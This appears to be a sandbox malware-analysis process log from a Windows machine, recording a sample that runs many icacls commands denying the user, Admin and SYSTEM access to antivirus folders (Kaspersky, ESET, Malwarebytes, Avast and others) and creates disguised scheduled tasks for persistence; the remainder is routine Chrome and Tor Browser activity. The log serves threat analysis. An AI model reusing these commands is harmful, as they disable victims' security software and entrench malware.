C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:1244
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵PID:4772
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:648
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5772 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:4556
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:5412
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:2132
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:2416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:1936
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:1820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:3972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1524
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:4200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:3904
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:2012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:4464
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4448 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:1724
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵PID:444
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5124
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:2016
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:4540
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵PID:6100
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:2988
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4492 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:5856
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:4948
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:1756
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3128 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:756
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵PID:4256
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1676 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵PID:4680
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵PID:5284
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:3980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1264
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3340 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:4556
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:5096
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4284 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:3596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2132
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4220 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:1192
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5892 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:3828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4256
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:6052
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:452
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:8 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:5408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1820
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:1724
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2528 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵PID:208
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:5648
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:4540
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:4948
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:5976
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:352 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:452
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵PID:1092
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:1196
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:4472
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3268 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:2108
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:452
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵PID:3332
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵PID:2968
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:4492
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵PID:3156
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:1244
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3620
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5880 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵PID:1524
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵PID:2816
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5900 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- Creates scheduled task(s)
PID:3076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1244
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4132
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=2320 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:7108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:6592
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=844 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1896
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:6480
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3088 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:6504
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5160 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5364
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:6584
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=3260 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2924
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1512
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=4720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:6384
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=3312 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:3312
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4980 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:6992
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6024 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4476
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=4464 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:4252
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:1312
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x424 0x5001⤵PID:2372
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"1⤵
- Executes dropped EXE
PID:2288 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4688 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.0.502385613\1521958810" -parentBuildID 20240510150000 -prefsHandle 1700 -prefMapHandle 1692 -prefsLen 21731 -prefMapSize 245600 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {3f36d919-ab89-4833-8649-fa0a1fda42ea} 4688 gpu3⤵
- Executes dropped EXE
PID:5888 -
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:679fbcdb86730ad560bc244da36cfbc3cccc619ec89727a9ca4e3e4f83 +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 4688 DisableNetwork 13⤵
- Executes dropped EXE
PID:180 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.1.35228174\2007884123" -childID 1 -isForBrowser -prefsHandle 2908 -prefMapHandle 2392 -prefsLen 22168 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {9510dc7a-982e-4b63-ab38-fce295cbd864} 4688 tab3⤵
- Executes dropped EXE
PID:5808 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.2.1530161683\50141753" -childID 2 -isForBrowser -prefsHandle 3224 -prefMapHandle 3220 -prefsLen 22298 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {88331b3e-122c-4485-836b-847358eaa80a} 4688 tab3⤵
- Executes dropped EXE
PID:5584 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.3.1032027761\1884162250" -childID 3 -isForBrowser -prefsHandle 3752 -prefMapHandle 3684 -prefsLen 21126 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7156dcbd-2bbf-464f-b51c-c659798ed050} 4688 tab3⤵
- Executes dropped EXE
PID:5356 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.4.339384661\1054425105" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3912 -prefsLen 21126 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2644a4b1-029b-47c5-b2d1-32f48af81970} 4688 tab3⤵
- Executes dropped EXE
PID:5332 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.5.1807471972\242689189" -childID 5 -isForBrowser -prefsHandle 4084 -prefMapHandle 4088 -prefsLen 21126 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {24b6c26a-4870-4661-8b5f-f38a2c26d22d} 4688 tab3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2056 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.6.1820739933\2091338224" -childID 6 -isForBrowser -prefsHandle 4432 -prefMapHandle 4424 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e423cd8d-fd31-4793-90e1-c08956fee3a4} 4688 tab3⤵
- Executes dropped EXE
PID:2968 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.7.121320416\1135899275" -childID 7 -isForBrowser -prefsHandle 3788 -prefMapHandle 3644 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7cd91538-7c64-4053-8cbe-7de5667fc766} 4688 tab3⤵
- Checks computer location settings
- Executes dropped EXE
PID:856 -
